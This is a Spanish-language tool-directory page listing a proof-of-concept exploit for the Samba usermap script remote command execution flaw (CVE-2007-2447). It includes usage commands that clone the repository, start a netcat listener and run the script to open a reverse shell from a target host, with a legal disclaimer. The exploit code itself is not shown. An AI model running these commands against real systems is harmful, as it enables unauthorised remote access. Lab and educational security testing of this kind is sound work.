Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2007-2447 — Exploit de prueba de concepto para ejecución remota de comandos en el script usermap de Samba (CVE-2007-2447), con capacidad de shell inversa para pruebas de laboratorio controladas e investigación de seguridad. | Kitploit
Herramientas/GitHubGitHub/abdulsaabir/cve-2007-2447
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Exploit de prueba de concepto para ejecución remota de comandos en el script usermap de Samba (CVE-2007-2447), con capacidad de shell inversa para pruebas de laboratorio controladas e investigación de seguridad.

Ver Repositorio
12hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2007-2447

PoC: Ejecución remota de comandos "usermap script" de Samba (CVE histórico). Este repositorio contiene un pequeño script de prueba de concepto para investigación y revisión educativa. El script principal es usermap_script_Command_Execution.py.

Referencia: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Uso

Clone el repositorio y ejecute el script en un laboratorio controlado. El PoC usa opcionalmente una reverse shell a LHOST:LPORT — inicie su listener antes de ejecutar el script y asegúrese de que las dependencias estén instaladas (consulte Instalación).

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

Parámetros

  • RHOST — IP o nombre de host objetivo
  • RPORT — puerto TCP objetivo (normalmente 139)
  • LHOST — IP del listener para una conexión reversa
  • LPORT — puerto del listener
  • Instalación

    Recomendado: cree un entorno virtual Python aislado e instale las dependencias desde requirements.txt antes de ejecutar el script.

    root@kitploit:~
    python3 -m venv exploit_env
    source exploit_env/bin/activate
    pip install -r requirements.txt
    

    Seguridad y Aviso Legal

    Este código se proporciona únicamente para fines legítimos de investigación en seguridad, educación y pruebas defensivas. No ejecute este script contra ningún sistema que no posea o para el que no tenga permiso explícito por escrito. El uso indebido puede acarrear consecuencias legales; el propietario del repositorio no se hace responsable del mal uso.

    Prefiera siempre la revisión estática de código y las pruebas controladas en laboratorio (instantáneas de VM, redes aisladas y capturas de paquetes) al analizar código potencialmente peligroso.

    Si desea un recorrido anotado no ejecutable o un requirements.txt, abra un issue o solicítelo aquí.

    Descargar herramienta